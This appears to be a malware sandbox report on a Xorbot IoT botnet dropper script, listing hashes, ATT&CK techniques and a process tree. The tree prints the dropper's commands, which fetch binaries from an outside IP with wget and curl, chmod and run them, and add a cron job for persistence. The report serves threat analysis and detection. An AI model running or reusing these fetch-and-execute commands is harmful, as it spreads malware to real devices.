xorbot | 37a5a3e5ce57b6a774808847b27b716c7809d8da5349d0a6c0ed0d945fd9de45

Analysis

max time kernel
149s
max time network
151s
platform
debian-9_armhf
resource
debian9-armhf-20240418-en
resource tags

arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
27/02/2025, 18:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

d8126e215a151514ecccbac0d89fa606
SHA1

b1a73227b60aed5bec1dfb839fb3284e529c3f14
SHA256

37a5a3e5ce57b6a774808847b27b716c7809d8da5349d0a6c0ed0d945fd9de45
SHA512

c5fb3b89c403a94cb75a375c82d4f541f3d1d290dd37156449ed63ae0d5ffa578a951e9068f65c8a353bd8e482cb73305b19a7401302a703351b3d3540cc7f7a
SSDEEP

192:NmZcq5vRAiAeAdAgAYA4bAiAeAdAgAYAuQn:Nm/5vRVxmnfTbVxmnfY

Score

10^/10

xorbot antivm botnet defense_evasion discovery execution persistence privilege_escalation trojan

Malware Config

Signatures

Detects Xorbot 1 IoCs

botnet trojan

resource	yara_rule
behavioral2/files/fstream-1.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot
Contacts a large (2161) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
678	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb	679	bins.sh

Renames itself 1 IoCs

pid	Process
680	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalation

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.38bDXB	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Checks CPU configuration 1 TTPs 2 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/689/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/731/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/864/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/962/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/970/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/275/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/709/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/813/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/837/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/951/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/992/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/743/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/792/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/858/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/905/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/927/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/930/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/977/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/978/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/filesystems	crontab
File opened for reading	/proc/840/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/941/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/947/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/965/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/993/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/1019/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/19/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/28/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/687/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/694/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/907/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/974/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/1009/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/756/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/875/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/879/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/1011/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/259/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/748/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/763/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/869/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/945/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/989/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/782/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/882/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/887/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/902/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/138/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/272/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/651/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/750/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/758/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/898/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/961/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/984/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/26/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/708/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/800/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/850/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/861/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/880/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/912/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
File opened for reading	/proc/918/cmdline	v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb

Writes file to tmp directory 3 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb	busybox
File opened for modification	/tmp/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb	wget
File opened for modification	/tmp/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb	curl

/tmp/bins.sh
/tmp/bins.sh
1⤵
- Executes dropped EXE
PID:646
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:648
- /usr/bin/wget
  wget http://37.44.238.88/bins/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
  2⤵
  - Writes file to tmp directory
  PID:650
- /usr/bin/curl
  curl -O http://37.44.238.88/bins/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:666
- /bin/busybox
  /bin/busybox wget http://37.44.238.88/bins/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
  2⤵
  - Writes file to tmp directory
  PID:674
- /bin/chmod
  chmod 777 v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
  2⤵
  - File and Directory Permissions Modification
  PID:678
- /tmp/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
  ./v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
  2⤵
  - Renames itself
  - Reads runtime system information
  PID:679
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:681
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:682
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:684
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      Reads runtime system information
      PID:685
- /bin/rm
  rm v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
  2⤵
  PID:688
- /usr/bin/wget
  wget http://37.44.238.88/bins/tZq2pUucDTcfj0bOnDclqm8m0Nt4dvZC73
  2⤵
  PID:691
- /usr/bin/curl
  curl -O http://37.44.238.88/bins/tZq2pUucDTcfj0bOnDclqm8m0Nt4dvZC73
  2⤵
  - Checks CPU configuration
  PID:772

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb

Filesize
127KB

MD5
89077b7bd4bcafca7713be43635c4862

SHA1
fc02edb8fba29ea8ee99e6157ef8560334530052

SHA256
78416feab0c93152d65acc8f48835520db083cc3aed0aea622b9fb88284dc00d

SHA512
1b457b8f8d452eecaad9013241e50672befb70feb5349f5fa72d62ea1fa8affa968763e6511cc76cdc5bf12f080e4a8f10c8e141ccd0d36794e721d690f2c4b1

Download Submit
/var/spool/cron/crontabs/tmp.38bDXB

Filesize
210B

MD5
3c2949a226500c174f39bd05d736dc22

SHA1
dcc8a157bc3f12df0342d3316aec0ccabec9ecb4

SHA256
2e7fc404ff38313193577aa69b9e095c391e424ba01ba186bb494873e5910454

SHA512
f50297f785b8c66ac7b334ba3a097db4727003916f764c25cb63c94d467edaf26fdf8f5658a6a806fa0a931868bcf0afbd21214f27a739a0e4af70fcf21335ff

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads